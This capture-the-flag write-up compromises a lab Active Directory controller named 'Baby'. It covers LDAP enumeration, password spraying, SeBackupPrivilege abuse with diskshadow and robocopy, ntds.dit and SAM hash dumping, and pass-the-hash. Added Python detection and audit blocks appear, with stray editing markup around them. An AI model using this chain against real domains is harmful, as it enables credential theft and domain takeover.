Baby - VL

Baby - Pretty Little Baby

Baby is a simple, nice, easy machine. LDAP allows anonymous binds, and a password has been left in the description field of a user. The password works for another user, but must be changed before it can be used. After changing it, I can use WinRM and discover that this user is a backup operator on the server. I’ll use Robocopy in backup mode to copy the flag, save the registry hives, and use diskshadow to snapshot the drive so I can copy ntds.dit to my machine and dump the hashes.

Recon

Nmap

As always, I’ll start off with nmap:

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-22 06:14:20Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   DNS_Tree_Name: baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-09-22T06:14:27+00:00
|_ssl-date: 2025-09-22T06:15:06+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2025-08-18T12:14:43
|_Not valid after:  2026-02-17T12:14:43
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb2-time:
|   date: 2025-09-22T06:14:31
|_  start_date: N/A

A typical DC. I already have the FQDN from the scan, but I’d rather have netexec generate the hosts file entry.

➜  Baby netexec smb 10.129.234.71 --generate-hosts-file hostz
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
➜  Baby cat hostz | sudo tee -a /etc/hosts
[sudo] password for simon:
10.129.234.71     BABYDC.baby.vl baby.vl BABYDC

SMB

There is no SMB guest access.

➜ Baby netexec smb 10.129.234.71 -u 'tryit' -p ''
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\tryit: STATUS_LOGON_FAILURE

LDAP

But LDAP does allow anonymous access.

➜  Baby netexec ldap 10.129.234.71 -u '' -p ''
LDAP        10.129.234.71   389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP        10.129.234.71   389    BABYDC           [+] baby.vl\:

Adding the --users flag also prints each user’s -Description- field, which is where admins sometimes leave a note or even a password.

➜  Baby netexec ldap 10.129.234.71 -u '' -p ''  --users
<SNIP>
LDAP        10.129.234.71   389    BABYDC           [*] Enumerated 9 domain users: baby.vl
LDAP        10.129.234.71   389    BABYDC           -Username-                    -Last PW Set-       -BadPW-  -Description-
LDAP        10.129.234.71   389    BABYDC           Guest                         <never>             0        Built-in account for guest access to the computer/domain
LDAP        10.129.234.71   389    BABYDC           Jacqueline.Barnett            2021-11-21 15:11:03 0
LDAP        10.129.234.71   389    BABYDC           Ashley.Webb                   2021-11-21 15:11:03 0
LDAP        10.129.234.71   389    BABYDC           Hugh.George                   2021-11-21 15:11:03 0
LDAP        10.129.234.71   389    BABYDC           Leonard.Dyer                  2021-11-21 15:11:03 0
LDAP        10.129.234.71   389    BABYDC           Connor.Wilkinson              2021-11-21 15:11:08 0
LDAP        10.129.234.71   389    BABYDC           Joseph.Hughes                 2021-11-21 15:11:08 0
LDAP        10.129.234.71   389    BABYDC           Kerry.Wilson                  2021-11-21 15:11:08 0
LDAP        10.129.234.71   389    BABYDC           Teresa.Bell                   2021-11-21 15:14:37 0        Set initial password to BabyStart123! 

This can be done via ldapsearch too.

</gr_replreplace>
<gr_insert after="163" cat="add_content" lang="python" orig="description: Set">
The defender-side counterpart to that enumeration is an audit of the same description fields. As an added example (my own Python, not part of the writeup), the block below parses the netexec --users table shown above, copied in as constructed input, and flags descriptions that mention a credential and end in a password-looking token; the keyword list and the password heuristic are my assumptions.

```python
import re

# Constructed input: three rows copied from the netexec --users table above
# (two with descriptions, one without) so the parser can be run offline.
NETEXEC_USERS_OUTPUT = """\
LDAP        10.129.234.71   389    BABYDC           Guest                         <never>             0        Built-in account for guest access to the computer/domain
LDAP        10.129.234.71   389    BABYDC           Jacqueline.Barnett            2021-11-21 15:11:03 0
LDAP        10.129.234.71   389    BABYDC           Teresa.Bell                   2021-11-21 15:14:37 0        Set initial password to BabyStart123!
"""

# One user row: tool prefix, username, -Last PW Set- (timestamp or <never>), -BadPW- count, optional description.
ROW_RE = re.compile(
    r"^LDAP\s+\S+\s+\d+\s+\S+\s+(?P<user>\S+)\s+"
    r"(?P<pwset><never>|\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"(?P<badpw>\d+)(?:\s+(?P<desc>\S.*?))?\s*$"
)
# Words that usually mean someone wrote a credential into the description (assumed list).
HINT_RE = re.compile(r"\b(password|passwd|pwd|pass|creds?|initial|temp(orary)?)\b", re.I)

def parse_users(output):
    """Turn netexec's user table into dicts; lines that do not match a user row are ignored."""
    rows = []
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append({"user": m["user"], "pwset": m["pwset"],
                         "badpw": int(m["badpw"]), "desc": (m["desc"] or "").strip()})
    return rows

def looks_like_password(token):
    """Heuristic: 8+ characters mixing letters with digits or symbols, as a real password would."""
    token = token.rstrip(".,;")
    return (len(token) >= 8 and re.search(r"[A-Za-z]", token) is not None
            and re.search(r"[0-9!@#$%^&*()_+=\-]", token) is not None)

def find_exposed_secrets(rows):
    """Return (user, candidate_secret) for every description that both mentions a credential
    and ends in a password-looking token; the fix is to clear the field and reset the account."""
    findings = []
    for r in rows:
        if r["desc"] and HINT_RE.search(r["desc"]):
            candidate = r["desc"].split()[-1].rstrip(".,;")
            if looks_like_password(candidate):
                findings.append((r["user"], candidate))
    return findings
```

Because the data comes from an anonymous bind, the same check can be run against the DC by anyone on the network, which is the real finding here.
<test>
rows = parse_users(NETEXEC_USERS_OUTPUT)
assert [r["user"] for r in rows] == ["Guest", "Jacqueline.Barnett", "Teresa.Bell"]
assert rows[0]["pwset"] == "<never>" and rows[1]["desc"] == ""
assert rows[2]["badpw"] == 0
assert find_exposed_secrets(rows) == [("Teresa.Bell", "BabyStart123!")]
assert looks_like_password("guest") is False
assert looks_like_password("BabyStart123!") is True
</test>
</gr_insert>
<gr_replace lines="167" cat="clarify" orig="User Teresa.Bell">
Teresa.Bell’s description says her initial password was set to BabyStart123!, but that password doesn’t work for her account.
➜  Baby ldapsearch -x -H ldap://10.129.234.71 -b "dc=baby,dc=vl" "(objectClass=*)" | grep description

<SNIP>
description: Set initial password to BabyStart123!

Shell as Caroline.Robinson

User Teresa.Bell does have initial password set to BabyStart123!. But the password doesn’t work for this account.

➜  Baby netexec ldap 10.129.234.71 -u 'Teresa.Bell' -p 'BabyStart123!'
LDAP        10.129.234.71   389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP        10.129.234.71   389    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123!
➜  Baby netexec smb 10.129.234.71 -u 'Teresa.Bell' -p 'BabyStart123!'
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE

Password Spraying

I’ll perform a password spray against the user list to check if any other accounts use the password BabyStart123!.

➜  Baby cat users.txt
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson
➜  Baby netexec smb 10.129.234.71 -u users.txt -p 'BabyStart123!'
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
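As an added example (my own Python, not part of the writeup), here is the detection side of that spray: a check over constructed Windows Security 4625 (failed logon) records, with source IPs and timestamps assumed, that flags a single source failing against many distinct accounts in a short window. The STATUS_PASSWORD_MUST_CHANGE result seen above is NTSTATUS 0xC0000224 in that log, so the one account the password was valid for stands out even among the failures.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security log 4625 records modelled on the spray above: one source, nine accounts,
# a few seconds. Fields: time, source IP, target user, NTSTATUS (0xC000006D = STATUS_LOGON_FAILURE).
# The last two rows are an unrelated user mistyping their own password from another host.
SAMPLE_4625 = [
    ("2025-09-22T06:31:40", "10.10.14.5", "Jacqueline.Barnett", "0xC000006D"),
    ("2025-09-22T06:31:40", "10.10.14.5", "Ashley.Webb", "0xC000006D"),
    ("2025-09-22T06:31:41", "10.10.14.5", "Hugh.George", "0xC000006D"),
    ("2025-09-22T06:31:41", "10.10.14.5", "Leonard.Dyer", "0xC000006D"),
    ("2025-09-22T06:31:41", "10.10.14.5", "Connor.Wilkinson", "0xC000006D"),
    ("2025-09-22T06:31:42", "10.10.14.5", "Joseph.Hughes", "0xC000006D"),
    ("2025-09-22T06:31:42", "10.10.14.5", "Kerry.Wilson", "0xC000006D"),
    ("2025-09-22T06:31:42", "10.10.14.5", "Teresa.Bell", "0xC000006D"),
    ("2025-09-22T06:31:43", "10.10.14.5", "Caroline.Robinson", "0xC0000224"),
    ("2025-09-22T06:35:10", "10.10.20.9", "Hugh.George", "0xC000006D"),
    ("2025-09-22T06:35:15", "10.10.20.9", "Hugh.George", "0xC000006D"),
]

STATUS_PASSWORD_MUST_CHANGE = "0xC0000224"  # right password, but expired: a spray "hit"

def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """One finding per source IP whose failed logons reach `min_users` distinct accounts
    inside any `window`; reports the widest such window and the accounts whose password
    was actually correct (STATUS_PASSWORD_MUST_CHANGE), which need an immediate reset."""
    by_source = defaultdict(list)
    for ts, src, user, status in events:
        by_source[src].append((datetime.fromisoformat(ts), user, status))
    findings = []
    for src, evs in by_source.items():
        evs.sort()
        best_span, best_count, start = None, 0, 0
        for end in range(len(evs)):
            # Slide the window start forward until the span covers at most `window` of time.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            span = evs[start:end + 1]
            distinct = len({u for _, u, _ in span})
            if distinct >= min_users and distinct > best_count:
                best_span, best_count = span, distinct
        if best_span:
            findings.append({
                "source": src,
                "users": sorted({u for _, u, _ in best_span}),
                "valid_but_expired": sorted(u for _, u, s in best_span if s == STATUS_PASSWORD_MUST_CHANGE),
            })
    return findings
```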

Changing Password

The password only worked for Caroline.Robinson, but the result was STATUS_PASSWORD_MUST_CHANGE rather than a success: the password is correct but has expired, so it has to be changed before it can be used. netexec’s change-password module can do that.

➜  Baby netexec smb 10.129.234.71 -u 'Caroline.Robinson' -p 'BabyStart123!' -M change-password -o NEWPASS=NewPass123!
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
CHANGE-P... 10.129.234.71   445    BABYDC           [+] Successfully changed password for Caroline.Robinson

Caroline.Robinson can WinRM onto the box.

➜  Baby netexec winrm 10.129.234.71 -u 'Caroline.Robinson' -p 'NewPass123!'
WINRM       10.129.234.71   5985   BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM       10.129.234.71   5985   BABYDC           [+] baby.vl\Caroline.Robinson:NewPass123! (Pwn3d!)

I can grab user.txt.

➜  Baby evil-winrm-py -i 10.129.234.71 -u 'Caroline.Robinson' -p 'NewPass123!'
          _ _            _
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.4.1

[*] Connecting to '10.129.234.71:5985' as 'Caroline.Robinson'
evil-winrm-py PS C:\Users\Caroline.Robinson\Documents> type ..\Desktop\user.txt
d63d5751c0f9..............

Shell as Administrator

This user has two interesting privileges.

evil-winrm-py PS C:\Users\Caroline.Robinson\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

The first is SeBackupPrivilege and the second is SeRestorePrivilege. I’ll use SeBackupPrivilege to read root.txt and to copy the registry hives to my VM to dump hashes.

Root.txt

To read any file, I can make a backup copy of it with robocopy in backup mode (/b, which SeBackupPrivilege permits regardless of the file’s ACL) and then read the copy, all in one line:

PS > mkdir c:/xf; robocopy /b C:\users\administrator\desktop C:\xf; cat c:/xf/root.txt
evil-winrm-py PS C:\Users\Caroline.Robinson\Documents> mkdir c:/xf; robocopy /b C:\users\administrator\desktop C:\xf; cat c:/xf/root.txt


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         9/22/2025   6:40 AM                xf

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Monday, September 22, 2025 6:40:00 AM
   Source : C:\users\administrator\desktop\
     Dest : C:\xf\

    Files : *.*
	
  Options : *.* /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

	                   2	C:\users\administrator\desktop\
	    New File  		     282	desktop.ini
  0%
100%
	    New File  		      34	root.txt
  0%
100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         2         2         0         0         0         0
   Bytes :       316       316         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00
   Ended : Monday, September 22, 2025 6:40:00 AM

4300b177dea030a........... <= root.txt

Shell

To get an Administrator shell, I’ll back up the SAM and SYSTEM hives with reg save and download them.

cmd /c "reg save HKLM\SAM SAM"
evil-winrm-py PS C:\Users\Caroline.Robinson\Documents> download SAM .
Downloading C:\Users\Caroline.Robinson\Documents\SAM: 64.0kB [00:00, 205MB/s]
[+] File downloaded successfully and saved as: /vulnlab/Baby/SAM

I can now dump it locally using pypykatz, giving it both the SAM and SYSTEM hives.

➜  Baby pypykatz registry --sam SAM SYSTEM
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 191d5d3fd5b0b51888453de8541d7e88
============== SAM hive secrets ==============
HBoot Key: 7e9695903f4da13d607d9b8d32b81d4d10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Fail

But I cannot connect with this hash, since it’s the local Administrator’s hash from the SAM, not the domain Administrator’s.

➜  Baby evil-winrm-py -i 10.129.234.71 -u Administrator -H 8d992faed38128ae85e95fa35868bb43
          _ _            _
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.4.1

[*] Connecting to '10.129.234.71:5985' as 'Administrator'
[-] Failed to authenticate the user Administrator with ntlm

Success

For Domain Admin, I’ll need to back up the ntds.dit file somehow and dump hashes again. The file is held open by the DC while it runs, so I’ll use this diskshadow script to snapshot the C: volume and expose the snapshot as E:, where the file can be copied from.

➜  Baby cat script.txt
set metadata C:\Windows\Temp\sweet.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
evil-winrm-py PS C:\Programdata> upload script.txt .
Uploading /vulnlab/Baby/script.txt: 100%|███████████████████████████████████████████| 176/176 [00:00<00:00, 700B/s]
[+] File uploaded successfully as: C:\Programdata\script.txt
evil-winrm-py PS C:\Programdata> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  BABYDC,  9/22/2025 7:01:08 AM

-> set metadata C:\Windows\Temp\sweet.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
Alias cdrive for shadow ID {654f8bd7-71c9-4896-83ed-b73340102ea9} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {8b9f2f67-e837-425d-bcd3-2efefb8a7d99} set as environment variable.


Querying all shadow copies with the shadow copy set ID {8b9f2f67-e837-425d-bcd3-2efefb8a7d99}

	* Shadow copy ID = {654f8bd7-71c9-4896-83ed-b73340102ea9}		%cdrive%
		- Shadow copy set: {8b9f2f67-e837-425d-bcd3-2efefb8a7d99}	%VSS_SHADOW_SET%
		- Original count of shadow copies = 1
		- Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
		- Creation time: 9/22/2025 7:01:27 AM
		- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
		- Originating machine: BabyDC.baby.vl
		- Service machine: BabyDC.baby.vl
		- Not exposed
		- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
		- Attributes:  No_Auto_Release Persistent Differential

Number of shadow copies listed: 1
-> expose %cdrive% E:
-> %cdrive% = {654f8bd7-71c9-4896-83ed-b73340102ea9}
The shadow copy was successfully exposed as E:\.
-> end backup

->
evil-winrm-py PS C:\Programdata> robocopy /b E:\Windows\ntds . ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Monday, September 22, 2025 7:01:46 AM
   Source : E:\Windows\ntds\
     Dest : C:\Programdata\

    Files : ntds.dit
	
  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

	                   1	E:\Windows\ntds\
	    New File  		  16.0 m	ntds.dit
<SNIP>
100%
100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   16.00 m   16.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00


   Speed :           178,481,021 Bytes/sec.
   Speed :            10,212.766 MegaBytes/min.
   Ended : Monday, September 22, 2025 7:01:46 AM

evil-winrm-py PS C:\Programdata> download ntds.dit
[-] Usage: download <remote_path> <local_path>
evil-winrm-py PS C:\Programdata> download ntds.dit .
[+] File downloaded successfully and saved as: /vulnlab/Baby/ntds.dit

Now I can dump the hashes with impacket-secretsdump, pointing it at the copied ntds.dit together with the SYSTEM hive, whose boot key is needed to decrypt them.

➜  Baby impacket-secretsdump -ntds ntds.dit -system SYSTEM -sam SAM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>
[*] Cleaning up...
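An added audit example, not part of the writeup: the user:rid:lmhash:nthash::: lines that pypykatz (earlier) and secretsdump (just above) print can be checked mechanically for what a defender needs in the report. The block is my own Python and runs on a constructed sample (three rows from this page plus an invented svc_legacy row with a placeholder LM value); it flags accounts with a blank password, accounts that still have an LM hash stored, and NT hashes shared between accounts, which means the same password is in use on both.

```python
import re
from collections import defaultdict

# NT hash of the empty string: an account showing it has no password set.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# Placeholder LM value written when no LM hash is stored, the default on current Windows.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Constructed sample in the format pypykatz and secretsdump print above. The first three rows
# are from this writeup; svc_legacy is invented, with a placeholder LM hash, to show the other checks.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_legacy:1105:00000000000000000000000000000001:8d992faed38128ae85e95fa35868bb43:::
"""

LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::", re.I)

def parse_dump(text):
    """Parse pwdump-style lines; anything else (banners, [*] status lines) is skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append({"user": m["user"], "rid": int(m["rid"]),
                            "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return entries

def audit(entries):
    """Three hygiene checks on a dump: blank passwords, LM hashes still stored, and NT hashes
    shared between accounts (same password, so compromising one account opens the other)."""
    by_nt = defaultdict(list)
    blank, lm_stored = [], []
    for e in entries:
        if e["nt"] == EMPTY_NT:
            blank.append(e["user"])
        else:
            by_nt[e["nt"]].append(e["user"])
        if e["lm"] != EMPTY_LM:
            lm_stored.append(e["user"])
    shared = [users for users in by_nt.values() if len(users) > 1]
    return {"blank_password": blank, "lm_stored": lm_stored, "shared_nt": shared}
```

The blank-password hits on this page (Guest, DefaultAccount, WDAGUtilityAccount) are built-in accounts that are disabled by default, which is why the check should be read together with each account’s status.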

I can now grab the root.txt.

➜  Baby evil-winrm-py -i 10.129.234.71 -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d
          _ _            _
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.4.1

[*] Connecting to '10.129.234.71:5985' as 'Administrator'
evil-winrm-py PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
4300b177dea030a9c.......

Thanks for reading the writeup.

PEPE

This post is licensed under CC BY 4.0 by the author.